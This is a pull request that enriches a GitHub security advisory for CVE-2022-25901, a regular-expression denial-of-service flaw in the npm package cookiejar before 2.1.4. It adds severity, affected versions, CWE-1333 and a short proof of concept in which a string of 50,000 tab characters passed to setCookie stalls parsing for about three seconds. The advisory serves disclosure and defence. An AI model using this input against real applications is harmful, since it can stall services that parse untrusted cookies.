### PR TITLE
[GHSA-h452-7996-h45h] Versions of the package cookiejar before 2.1.4 are...

### DIFF
--- a/advisories/unreviewed/2023/01/GHSA-h452-7996-h45h/GHSA-h452-7996-h45h.json
+++ b/advisories/unreviewed/2023/01/GHSA-h452-7996-h45h/GHSA-h452-7996-h45h.json
@@ -1,17 +1,42 @@
 {
   "schema_version": "1.3.0",
   "id": "GHSA-h452-7996-h45h",
-  "modified": "2023-01-18T06:31:03Z",
+  "modified": "2023-01-21T15:33:51Z",
   "published": "2023-01-18T06:31:03Z",
   "aliases": [
     "CVE-2022-25901"
   ],
-  "details": "Versions of the package cookiejar before 2.1.4 are vulnerable to Regular Expression Denial of Service (ReDoS) via the Cookie.parse function, which uses an insecure regular expression.",
+  "summary": "cookiejar Regular Expression Denial of Service Vulnerability",
+  "details": "Versions of the package cookiejar before 2.1.4 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `Cookie.parse` function and other aspects of the API, which use an insecure regular expression for parsing cookie values. Applications could be stalled for extended periods of time if untrusted input is passed to cookie values or attempted to parse from request headers.\n\nProof of concept:\n\n```ts\nconst { CookieJar } = require(\"cookiejar\");\n\nconst jar = new CookieJar();\n\nconst start = performance.now();\n\nconst attack = \"a\" + \"\\t\".repeat(50_000);\njar.setCookie(attack);\n\nconsole.log(`CookieJar.setCookie(): ${performance.now() - start}ms`);\n```\n\n```\nCookieJar.setCookie(): 2963.214399999939ms\n```",
   "severity": [
-
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
+    }
   ],
   "affected": [
-
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "cookiejar"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": ">= 2.1.4"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "< 2.1.4"
+      }
+    }
   ],
   "references": [
     {
@@ -25,6 +50,10 @@
     {
       "type": "WEB",
       "url": "https://github.com/bmeck/node-cookiejar/pull/39/commits/eaa00021caf6ae09449dde826108153b578348e5"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/bmeck/node-cookiejar/blob/master/cookiejar.js#23L73"
     },
     {
       "type": "WEB",
@@ -41,9 +70,9 @@
   ],
   "database_specific": {
     "cwe_ids": [
-
+      "CWE-1333"
     ],
-    "severity": null,
+    "severity": "MODERATE",
     "github_reviewed": false
   }
 }


### PR DESCRIPTION
**Updates**
- Affected products
- CVSS
- CWEs
- Description
- Severity
- Source code location
- Summary

**Comments**
The data was not present previously. This correctly adds more data to the description and a Proof of Concept. Furthermore, this specifies the NPM listing, severity, and CWE as specified in the snyk posting.